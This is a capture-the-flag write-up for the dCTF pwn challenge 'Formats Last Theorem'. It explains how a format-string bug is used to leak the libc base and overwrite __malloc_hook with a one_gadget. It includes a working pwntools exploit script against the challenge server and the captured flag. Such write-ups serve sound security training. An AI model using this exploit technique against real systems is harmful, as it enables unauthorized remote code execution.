dCTF - Formats Last Theorem(pwn)
Table of Contents
Challenge Description
I dare you to hook the malloc
nc dctf-chall-formats-last-theorem.westeurope.azurecontainer.io 7482
We are provided with the binary and a docker file. We first check the security features of the binary.
[*] '/media/sf_dabian/Challenges/dctf/pwn/lft/formats_last_theorem' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled
Connecting to the service, we get prompted for an input, which seems to continuously loop and prompt for more input.
➜ nc dctf-chall-formats-last-theorem.westeurope.azurecontainer.io 7482
I won't ask you, what your name is. It's getting kinda old at this point
you entered
I won't ask you, what your name is. It's getting kinda old at this point
you entered
Seeing that the program echoes our input back to us, we try a format string and voila! We evidently have a format string exploit.
Decompiling in IDA, we get the following psuedo source code.
void __noreturn vuln()
char format[104]; // [rsp+0h] [rbp-70h] BYREF
unsigned __int64 v1; // [rsp+68h] [rbp-8h]
v1 = __readfsqword(0x28u);
while ( 1 )
puts("I won't ask you, what your name is. It's getting kinda old at this point");
__isoc99_scanf("%100s", format);
puts("you entered");
int main()
We also look at our DockerFile,
FROM ubuntu:18.04
RUN apt-get update && apt-get install -y make gcc socat
RUN groupadd pilot
RUN useradd pilot --gid pilot
COPY ./app /app
ENTRYPOINT [ "bash", "/app/startService.sh" ]
Exploitation Ideas
We have a format string exploit with unlimited inputs, that should make it easy. However, FULL RELRO is enabled, that means it is going to be impossible to overwrite anything in the Global Offset Table
. Hmm that makes things difficult, the challenge description hints to malloc
Interesting! Let’s look at printf
source code,
if (width >= WORK_BUFFER_SIZE - 32)
size_t needed = ((size_t) width + 32) * sizeof (CHAR_T);
workstart = (CHAR_T *) malloc (needed);
By searching malloc in vfprintf.c
, it seems that we can trigger malloc
and the following free
if the width field of the format placeholder is large enough.
Since __malloc_hook
and __free_hook
are functions in the libc, and not in the GOT
, we can overwrite them easily despite FULL RELRO
by providing large format placeholder.
Hence, if you think about it, we are easily able to overwrite __malloc_hook
or __free_hook
with a one_gadget
and hence get a shell.
printf -> __malloc_hook -> pop shell
However, since PIE
is enabled, we have to leak our libc.address
off the stack. And for us to get a correct offset for a libc function
in the stack, we have to be running our binary on the same libc
and ld
as them.
Here is where our DockerFile comes in.
FROM ubuntu:18.04
Every version of Ubuntu
has its own libc
and ld
. Since we have the ubuntu version, we can just obtain our libc
and ld
as well.
Let’s modify the DockerFile to make our life easy.
FROM ubuntu:18.04
CMD [ "sha1sum", "/lib/x86_64-linux-gnu/libc.so.6" ]
and run it. We can use libc-database identify for this.
Let’s start exploiting!
First we load our libc
and ld
to our binary with patchelf
patchelf --replace-needed libc.so.6 /root/libc-database/libs/libc6_2.27-3ubuntu1.4_amd64/libc-2.27.so ./formats_last_theorem
patchelf --set-interpreter /root/libc-database/libs/libc6_2.27-3ubuntu1.4_amd64/ld-2.27.so ./formats_last_theorem
Using GDB
, we can find that the 3rd format string offset points to write+20
I won't ask you, what your name is. It's getting kinda old at this point
you entered
pwndbg> x 0x7ffff7af2224
0x7ffff7af2224 <write+20>: 0xf0003d48
We also need our one_gadget
➜ one_gadget /root/libc-database/libs/libc6_2.27-3ubuntu1.4_amd64/libc.so.6
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
[rsp+0x70] == NULL
We will take 0x10a41c
Let’s write our exploit script!
With fmtstr_payload
, we are easily able to overwrite __malloc_hook
with our one_gadget. However, it did not work initially at first and it took a little big of messing around of settings to get it to work with an extra argument write_size='short'
After we overwrite __malloc_hook
with our one_gadget
, we send a large enough format string placeholder to trigger malloc
and get our shell.
context.binary = elf = ELF('formats_last_theorem')
#p = process('./formats_last_theorem')
p = remote('dctf-chall-formats-last-theorem.westeurope.azurecontainer.io', 7482)
libc = ELF('/root/libc-database/libs/libc6_2.27-3ubuntu1.4_amd64/libc-2.27.so')
p.sendlineafter('point\n', '%3$p')
p.recvuntil('you entered\n')
libcwrite = int(p.recvline().strip().decode(), 16)
libc.address = libcwrite - libc.sym.write - 20
log.warn(f"libc base @ {hex(libc.address)}")
payload = fmtstr_payload(6, {libc.sym.__malloc_hook: (0x10a41c + libc.address)}, write_size='short')
p.sendlineafter('point\n', payload)
p.sendlineafter('point\n', '%10000$c')
#: dctf{N0t_all_7h30r3ms_s0und_g00d}
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